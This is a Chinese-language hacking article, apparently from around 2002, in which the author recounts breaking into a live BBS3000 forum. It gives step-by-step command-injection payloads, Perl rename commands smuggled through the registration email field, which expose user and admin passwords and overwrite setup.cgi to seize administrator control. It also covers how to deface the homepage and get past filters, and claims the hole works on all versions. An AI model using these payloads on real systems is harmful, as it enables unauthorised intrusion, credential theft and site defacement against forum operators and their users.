我的一次入侵bbs3000取得最高权限

/ns/hk/hacker/data/20020810041233.htm

我的一次入侵bbs3000取得最高权限

温柔小刀



刚看完一篇关于cgi的解析机制的文章，发现了一些漏洞可能可以利用，就拿bbs3000开刀试试。
先上网搜索一个bbs3000的论坛，在google.com键入”bbs/list.cgi“，出来了一大堆，看到一个粘贴美女图的论坛很不爽，就拿你开刀。先注册一用户名为;字符，密码为空格，信箱为
rename "admin.cgi","readme.txt";#@3wcool.com
（这里假设admin为该论坛的社区区长，也就是该论坛最大权限的用户,readme.txt 为自己随便起的一个txt文件），然后我们在IE地址栏内输入：
http://x.x.x.x/bbs3000/yhzl/;.cgi
(x.x.x.x为该网站的域名，下同）
返回的页面显示
'F:\wwwroot\bbs3000\yhzl\;.cgi' script produced no output 后面的就是关键了，再输入这样
的看看
http://x.x.x.x/bbs3000/yhzl/readme.txt
返回的页面显示为
admin admin http://x.x.x.x 2002-04-16
显示的内容前面就是密码、用户
天啊，事情怎么那么容易呀！！~_*

再修改资料把信箱改成rename "readme.txt","admin.cgi";#@3wcool.com
这样就可以用admin登入论坛了，之后你就可以，哈哈，不要扔我。
再跑的
http://x.x.x.x/bbs3000/cjyh.cgi输入用户admin，密码admin，我靠，居然不行，区长设置的管理密码和他的用户密码不一样。那好，我看你的setup.cgi里面的密码是什么。
再把我的油箱改成
rename "../setup.cgi","readme.cgi";#@3wcool.com
然后重复上面步骤在IE地址栏内输入：
http://x.x.x.x/bbs3000/yhzl/;.cgi
(x.x.x.x为该网站的域名，下同）
返回的页面显示
'F:\wwwroot\bbs3000\bbs3000\yhzl\;.cgi' script produced no output 后面的就是关键了，再输入这样
的看看
http://x.x.x.x/bbs3000/yhzl/readme.txt
返回的页面显示为
$admname="admin";
$delpsd="admin123";
$imagurl="http://x.x.x.x/bbs/image";
$filepath="D:/wwwroot/cgi-bin/bbs";
$ImgDir="D:/wwwroot/bbs/image";
$ym="http://x.x.x.x/cgi-bin/bbs";
…………
……
则管理员帐号为admin，密码为admin123，返回登入管理界面，靠，现在是什么都不行了，因为论坛缺少了setup.cgi这个文件，所有的cgi都打不开了，拿了密码也没有用了。下线，等斑竹自己修复，我还要去背单词，要考试了。（可能你们要问为什么邮箱不用copy "../setup.cgi","readme.cgi";#@3wcool.com，我试过，没用，可能是权限不够）
到了晚上再来看看论坛已经修好了，我不罢休换个思路再来。
我先发表了一篇文章，随便写点，肯定会被删的东西。然后用论坛上传文件的功能，上传了一个bbs3000原程序中的setup.cgi，自己定义好管理员帐号，密码；再改成的read.txt文件，因为后缀是cgi的文件，论坛不支持。发表后查看那个read.txt文件的路径为
http://x.x.x.x/bbs/image/affix/20010615135901.txt
好的， 抄出旧刀，把;的邮箱改成
rename "../../bbs/20010615135901.txt","../setup.cgi";#@3wcool.com
然后在IE地址栏内输入：
http://x.x.x.x/bbs3000/yhzl/;.cgi
好，这下就可以用自己定义的帐号，密码登入管理界面了.
在狠一点，把邮箱改改，上传一个首页把它的首页更换掉。
哈，怎一个爽字了的。
心情好的时候，一口气背了100面单词…………


有几点值得注意的：
1：此漏洞对于目前发行的一切bbs3000版本都通吃。
2：此漏洞只存在与win2000的机子，且cgi是采用应用程序映射:perlIS.dll应用程序映射的，很多空间又支持asp又支持cgi的多为这种。
3：啊，怎么有人比我先注册了；这个用户名，看来已经背他洗劫过一次了，没有关系，换个用户名1；或2；只要最后是；的什么都行，什么斑竹把用户名含；过滤掉了，拿就随便注册一个把邮箱改成
；rename "admin.cgi","readme.txt";#@3wcool.com
前面加一个；号。
好了，告诉大家一句，擅自更改删除别人的数据为违法行为，请大家不要太过分。



来源：小凤居